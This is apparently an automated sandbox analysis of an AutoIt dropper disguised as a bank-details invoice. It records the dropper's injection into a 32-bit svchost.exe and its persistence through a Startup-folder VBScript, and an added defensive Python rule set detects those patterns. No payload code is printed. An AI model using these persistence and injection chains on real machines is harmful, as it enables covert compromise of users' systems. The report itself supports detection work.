                  Source: confirm bank details invoice.exe, 00000000.00000000.2140619357.000000000051E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: JSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_df64b0a4-9
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe, Code function: 2_2_00D23D19 references the string "This is a third-party compiled AutoIt script."
                  Source: deblaterate.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: deblaterate.exe, 00000002.00000002.2185715713.0000000000DCE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_36d9ed64-6
                  Source: deblaterate.exe, 00000002.00000002.2185715713.0000000000DCE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_712e269f-f
                  Source: deblaterate.exe, 00000005.00000000.2292381951.0000000000DCE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_5d3d2c7a-f
                  Source: deblaterate.exe, 00000005.00000000.2292381951.0000000000DCE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_90dc5791-e
                  Source: confirm bank details invoice.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b664a442-f
                  Source: confirm bank details invoice.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_5133e0ec-4
                  Source: deblaterate.exe.0.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7ee01bb6-0
                  Source: deblaterate.exe.0.drString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_44fd17fe-1
                  Source: initial sample, Static PE information: Filename: confirm bank details invoice.exe
                  Source: C:\Windows\System32\wscript.exe, COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0042CB93 NtClose,3_2_0042CB93
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672B60 NtClose,LdrInitializeThunk,3_2_03672B60
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_03672DF0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036735C0 NtCreateMutant,LdrInitializeThunk,3_2_036735C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03674340 NtSetContextThread,3_2_03674340
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03674650 NtSuspendThread,3_2_03674650
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672BE0 NtQueryValueKey,3_2_03672BE0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672BF0 NtAllocateVirtualMemory,3_2_03672BF0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672BA0 NtEnumerateValueKey,3_2_03672BA0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672B80 NtQueryInformationFile,3_2_03672B80
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672AF0 NtWriteFile,3_2_03672AF0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672AD0 NtReadFile,3_2_03672AD0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672AB0 NtWaitForSingleObject,3_2_03672AB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03672F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03672F30 NtCreateSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03672FE0 NtCreateFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03672FA0 NtQuerySection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03672FB0 NtResumeThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03672F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03672E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03672EE0 NtQueueApcThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03672EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03672E80 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03672D30 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03672D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03672D10 NtMapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03672DD0 NtDelayExecution
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03672DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03672C60 NtCreateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03672C70 NtFreeVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03672C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03672CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03672CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03672CA0 NtQueryInformationToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03673010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03673090 NtSetValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_036739B0 NtGetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03673D70 NtOpenThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03673D10 NtOpenProcessToken
Source: C:\Users\user\Desktop\confirm bank details invoice.exe | Code function: 0_2_004B6606: CreateFileW, DeviceIoControl, CloseHandle
Source: C:\Users\user\Desktop\confirm bank details invoice.exe | Code function: 0_2_004AACC5: _memset, DuplicateTokenEx, CloseHandle, OpenWindowStationW, GetProcessWindowStation, SetProcessWindowStation, OpenDesktopW, _wcscpy, LoadUserProfileW, CreateEnvironmentBlock, CreateProcessAsUserW, UnloadUserProfile, CloseWindowStation, CloseDesktop, SetProcessWindowStation, CloseHandle, DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\confirm bank details invoice.exe | Code function: 0_2_004B79D3: ExitWindowsEx, InitiateSystemShutdownExW, SetSystemPowerState
Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe | Code function: 2_2_00D679D3: ExitWindowsEx, InitiateSystemShutdownExW, SetSystemPowerState
Source: C:\Users\user\Desktop\confirm bank details invoice.exe | Code functions:
    0_2_0049B043, 0_2_00483200, 0_2_00483B70, 0_2_004A410F, 0_2_004902A4, 0_2_0047E3E3, 0_2_004A038E, 0_2_004A467F,
    0_2_004906D9, 0_2_004DAACE, 0_2_004A4BEF, 0_2_0049CCC1, 0_2_0047AF50, 0_2_00476F07, 0_2_0048B11F, 0_2_0049D1B9,
    0_2_004D31BC, 0_2_004A724D, 0_2_0049123A, 0_2_004B13CA, 0_2_004793F0, 0_2_0048F563, 0_2_004BB6CC, 0_2_004796C0,
    0_2_004DF7FF, 0_2_004777B0, 0_2_004A79C9, 0_2_0048FA57, 0_2_00479B60, 0_2_00477D19, 0_2_0048FE6F, 0_2_00499ED0,
    0_2_00477FA3, 0_2_01343388
Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe | Code functions:
    2_2_00D4B043, 2_2_00D33200, 2_2_00D33B70, 2_2_00D5410F, 2_2_00D402A4, 2_2_00D5038E, 2_2_00D2E3B0, 2_2_00D406D9,
    2_2_00D5467F, 2_2_00D8AACE, 2_2_00D54BEF, 2_2_00D4CCC1, 2_2_00D2AF50, 2_2_00D26F07, 2_2_00D831BC, 2_2_00D4D1B9,
    2_2_00D3B11F, 2_2_00D5724D, 2_2_00D4123A, 2_2_00D613CA, 2_2_00D293F0, 2_2_00D3F563, 2_2_00D296C0, 2_2_00D6B6CC,
    2_2_00D8F7FF, 2_2_00D277B0, 2_2_00D579C9, 2_2_00D3FA57, 2_2_00D29B60, 2_2_00D27D19, 2_2_00D49ED0, 2_2_00D3FE6F,
    2_2_00D27FA3, 2_2_018E2898
Source: C:\Windows\SysWOW64\svchost.exe | Code functions:
    3_2_004011D0, 3_2_004101EA, 3_2_0042F1F3, 3_2_004101F3, 3_2_00416BDE, 3_2_00416BE3, 3_2_0040E3F3, 3_2_00402400,
    3_2_00410413, 3_2_0040E543, 3_2_0040E53D, 3_2_00402EE0, 3_2_036FA352, 3_2_0364E3F0, 3_2_037003E6, 3_2_036E0274,
    3_2_036C02C0, 3_2_036C8158, 3_2_03630100, 3_2_036DA118, 3_2_036F81CC, 3_2_036F41A2, 3_2_037001AA, 3_2_036D2000,
    3_2_03640770, 3_2_03664750, 3_2_0363C7C0, 3_2_0365C6E0, 3_2_03640535, 3_2_03700591, 3_2_036F2446, 3_2_036E4420,
    3_2_036EE4F6, 3_2_036FAB40, 3_2_036F6BD7, 3_2_0363EA80, 3_2_03656962, 3_2_036429A0, 3_2_0370A9A6, 3_2_0364A840,
    3_2_03642840, 3_2_0366E8F0, 3_2_036268B8, 3_2_036B4F40, 3_2_03682F28, 3_2_03660F30, 3_2_036E2F30, 3_2_0364CFE0,
    3_2_03632FC8, 3_2_036BEFA0, 3_2_03640E59, 3_2_036FEE26, 3_2_036FEEDB, 3_2_03652E90, 3_2_036FCE93, 3_2_0364AD00,
    3_2_036DCD1F, 3_2_0363ADE0, 3_2_03658DBF, 3_2_03640C00, 3_2_03630CF2, 3_2_036E0CB5, 3_2_0362D34C, 3_2_036F132D,
    3_2_0368739A, 3_2_036E12ED, 3_2_0365B2C0, 3_2_036452A0, 3_2_0367516C, 3_2_0362F172, 3_2_0370B16B, 3_2_0364B1B0,
    3_2_036F70E9, 3_2_036FF0E0, 3_2_036EF0CC, 3_2_036470C0, 3_2_036FF7B0, 3_2_03685630, 3_2_036F16CC, 3_2_036F7571,
    3_2_037095C3, 3_2_036DD5B0, 3_2_03631460, 3_2_036FF43F, 3_2_036FFB76, 3_2_036B5BF0, 3_2_0367DBF9, 3_2_0365FB80,
    3_2_036B3A6C, 3_2_036FFA49, 3_2_036F7A46, 3_2_036EDAC6, 3_2_036DDAAC, 3_2_03685AA0, 3_2_036E1AA3, 3_2_03649950,
    3_2_0365B950, 3_2_036D5910, 3_2_036AD800, 3_2_036438E0, 3_2_036FFF09, 3_2_036FFFB1, 3_2_03641F92, 3_2_03649EB0,
    3_2_036F7D73, 3_2_03643D40, 3_2_036F1D5A, 3_2_0365FDC0, 3_2_036B9C32, 3_2_036FFCF2
Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe | Code function: String function: 00D3EC2F appears 68 times
Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe | Code function: String function: 00D46AC0 appears 42 times
Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe | Code function: String function: 00D4F8A0 appears 35 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 036AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03675130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 036BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0362B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03687E54 appears 111 times
Source: C:\Users\user\Desktop\confirm bank details invoice.exe | Code function: String function: 0048EC2F appears 68 times
Source: C:\Users\user\Desktop\confirm bank details invoice.exe | Code function: String function: 00496AC0 appears 42 times
Source: C:\Users\user\Desktop\confirm bank details invoice.exe | Code function: String function: 0049F8A0 appears 35 times
Source: confirm bank details invoice.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.troj.expl.evad.winEXE@10/6@0/0
Source: C:\Users\user\Desktop\confirm bank details invoice.exe | Code function: 0_2_004BCE7A GetLastError, FormatMessageW
Source: C:\Users\user\Desktop\confirm bank details invoice.exe | Code function: 0_2_004AAB84 AdjustTokenPrivileges, CloseHandle
Source: C:\Users\user\Desktop\confirm bank details invoice.exe | Code function: 0_2_004AB134 LookupPrivilegeValueW, AdjustTokenPrivileges, GetLastError
Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe | Code function: 2_2_00D5AB84 AdjustTokenPrivileges, CloseHandle
Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe | Code function: 2_2_00D5B134 LookupPrivilegeValueW, AdjustTokenPrivileges, GetLastError
Source: C:\Users\user\Desktop\confirm bank details invoice.exe | Code function: 0_2_004BE1FD SetErrorMode, GetDiskFreeSpaceExW, SetErrorMode
Source: C:\Users\user\Desktop\confirm bank details invoice.exe | Code function: 0_2_004B6532 CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, __wsplitpath, _wcscat, CloseHandle
Source: C:\Users\user\Desktop\confirm bank details invoice.exe | Code function: 0_2_004CC18C CoInitializeSecurity, _memset, _memset, CoCreateInstanceEx, CoTaskMemFree, CoSetProxyBlanket
Source: C:\Users\user\Desktop\confirm bank details invoice.exe | Code function: 0_2_0047406B CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource, LockResource
Source: C:\Users\user\Desktop\confirm bank details invoice.exe | File created: C:\Users\user\AppData\Local\Vevina
Source: C:\Users\user\Desktop\confirm bank details invoice.exe | File created: C:\Users\user\AppData\Local\Temp\autC696.tmp
Source: confirm bank details invoice.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\confirm bank details invoice.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: confirm bank details invoice.exe | ReversingLabs: Detection: 34%
Source: C:\Users\user\Desktop\confirm bank details invoice.exe | File read: C:\Users\user\Desktop\confirm bank details invoice.exe
Source: unknown | Process created: C:\Users\user\Desktop\confirm bank details invoice.exe "C:\Users\user\Desktop\confirm bank details invoice.exe"
Source: C:\Users\user\Desktop\confirm bank details invoice.exe | Process created: C:\Users\user\AppData\Local\Vevina\deblaterate.exe "C:\Users\user\Desktop\confirm bank details invoice.exe"
Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\confirm bank details invoice.exe"
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Vevina\deblaterate.exe "C:\Users\user\AppData\Local\Vevina\deblaterate.exe"
Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Vevina\deblaterate.exe"
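The "Process created" lines above carry the two signals a detection engineer would key on: deblaterate.exe starts C:\Windows\SysWOW64\svchost.exe, yet the logged command line of that svchost.exe is the dropper's own path (the image on disk and the program the command line names disagree, which is what a hollowed or section-mapped payload looks like in telemetry), and wscript.exe runs a .vbs out of the per-user Startup folder and then spawns an executable from %LOCALAPPDATA%. The following is an added example, not Joe Sandbox code and not from the sample: a small rule set over Sysmon-style process-creation events, run against events constructed to mirror this report's tree plus one benign svchost.exe baseline. Where the report lists the parent as "unknown", explorer.exe is an assumed stand-in; the "services.exe is the only legitimate parent of svchost.exe" rule is a stock-host assumption and needs an allow-list in environments with other service launchers.

```python
"""
Process-creation triage rules modelled on this report's process tree:
dropper -> deblaterate.exe -> C:\Windows\SysWOW64\svchost.exe, and
Startup-folder .vbs -> wscript.exe -> deblaterate.exe -> svchost.exe.
Added example; not Joe Sandbox code and not from the sample. The events
below are constructed to mirror the report's "Process created" lines; the
report shows "unknown" as the parent of the first process in each chain,
so explorer.exe is an assumed stand-in.
"""
from __future__ import annotations

import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str         # path of the executable backing the new process
    cmdline: str       # command line as logged (Sysmon Event ID 1 style)
    parent_image: str  # path of the parent's executable


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# per-user Startup folder followed by a file with a Windows Script Host extension
STARTUP_SCRIPT = re.compile(
    r'\\start menu\\programs\\startup\\[^"]*?\.(?:vbs|vbe|js|jse|wsf|wsh)\b'
)


def first_token(cmdline: str) -> str:
    """argv[0] of a Windows command line: a quoted path, else text up to the first space."""
    s = cmdline.lstrip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end != -1 else s[1:]
    return s.split(" ", 1)[0]


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def check(ev: ProcEvent) -> list[str]:
    """Return the names of every rule the event trips, in a fixed order."""
    hits: list[str] = []
    image = basename(ev.image)
    parent = basename(ev.parent_image)
    argv0 = basename(first_token(ev.cmdline))
    low_image = ev.image.lower()
    low_cmd = ev.cmdline.lower()

    # R1: the executable on disk is not the program the command line names.
    # The report's svchost.exe children carry the dropper's path as their
    # command line, which is how a hollowed or section-mapped payload logs.
    if argv0 and argv0 != image:
        hits.append("image-cmdline-mismatch")

    # R2: on a stock host svchost.exe is started by services.exe; any other
    # parent needs allow-listing per environment (assumption: none here).
    # The 32-bit copy under SysWOW64 is rarely launched legitimately on x64.
    if image == "svchost.exe":
        if parent != "services.exe":
            hits.append("svchost-unexpected-parent")
        if "\\syswow64\\" in low_image:
            hits.append("svchost-from-syswow64")

    # R3: script host running a script that lives in the per-user Startup folder
    if image in SCRIPT_HOSTS and STARTUP_SCRIPT.search(low_cmd):
        hits.append("script-in-startup-folder")

    # R4: script host spawning an executable out of the user's profile
    if parent in SCRIPT_HOSTS and "\\appdata\\" in low_image:
        hits.append("scripthost-spawns-appdata-exe")
    return hits


# Constructed events mirroring the report, plus one benign svchost.exe baseline.
SAMPLE = r"C:\Users\user\Desktop\confirm bank details invoice.exe"
DROPPED = r"C:\Users\user\AppData\Local\Vevina\deblaterate.exe"
SVCHOST32 = r"C:\Windows\SysWOW64\svchost.exe"
WSCRIPT = r"C:\Windows\System32\wscript.exe"
VBS = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs"
EXPLORER = r"C:\Windows\explorer.exe"  # assumed parent where the report says "unknown"

EVENTS = [
    ProcEvent(1, r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\System32\svchost.exe -k netsvcs -p",
              r"C:\Windows\System32\services.exe"),
    ProcEvent(2, SAMPLE, f'"{SAMPLE}"', EXPLORER),
    ProcEvent(3, DROPPED, f'"{SAMPLE}"', SAMPLE),
    ProcEvent(4, SVCHOST32, f'"{SAMPLE}"', DROPPED),
    ProcEvent(5, WSCRIPT, f'"C:\\Windows\\System32\\WScript.exe" "{VBS}"', EXPLORER),
    ProcEvent(6, DROPPED, f'"{DROPPED}"', WSCRIPT),
    ProcEvent(7, SVCHOST32, f'"{DROPPED}"', DROPPED),
]


def scan(events: list[ProcEvent]) -> dict[int, list[str]]:
    """pid -> rule hits for every event that trips at least one rule."""
    findings: dict[int, list[str]] = {}
    for ev in events:
        hits = check(ev)
        if hits:
            findings[ev.pid] = hits
    return findings


if __name__ == "__main__":
    for pid, hits in scan(EVENTS).items():
        print(pid, ", ".join(hits))
```

Run stand-alone it reports nothing for the services.exe-launched svchost.exe and the dropper's own launch, one mismatch hit for deblaterate.exe started under the dropper's command line, three hits for each SysWOW64\svchost.exe child, and the Startup-folder and AppData rules for the wscript.exe chain. R1 is the one that survives renaming: whatever the dropper is called, a system binary whose command line names a different executable is worth a look.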
Source: C:\Users\user\Desktop\confirm bank details invoice.exe | Sections loaded: apphelp.dll, wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, iphlpapi.dll, userenv.dll, uxtheme.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, ntmarta.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll
Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe | Sections loaded: apphelp.dll, wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, iphlpapi.dll, userenv.dll, uxtheme.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, ntmarta.dll
Source: C:\Windows\System32\wscript.exe | Sections loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mlang.dll, mpr.dll, scrrun.dll, windows.storage.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: confirm bank details invoice.exeStatic file information: File size 1214464 > 1048576
                  Source: confirm bank details invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: confirm bank details invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: confirm bank details invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: confirm bank details invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: confirm bank details invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: confirm bank details invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: confirm bank details invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: wntdll.pdbUGP source: deblaterate.exe, 00000002.00000003.2182122492.00000000040B0000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 00000002.00000003.2181870109.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2296558454.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2352991804.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2294004836.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2352991804.000000000379E000.00000040.00001000.00020000.00000000.sdmp, deblaterate.exe, 00000005.00000003.2314686450.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 00000005.00000003.2315495745.0000000003620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2420985063.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2418955435.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2463444014.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2463444014.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: deblaterate.exe, 00000002.00000003.2182122492.00000000040B0000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 00000002.00000003.2181870109.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000003.2296558454.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2352991804.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2294004836.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2352991804.000000000379E000.00000040.00001000.00020000.00000000.sdmp, deblaterate.exe, 00000005.00000003.2314686450.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 00000005.00000003.2315495745.0000000003620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2420985063.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2418955435.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2463444014.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2463444014.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp
                  Source: confirm bank details invoice.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: confirm bank details invoice.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: confirm bank details invoice.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: confirm bank details invoice.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
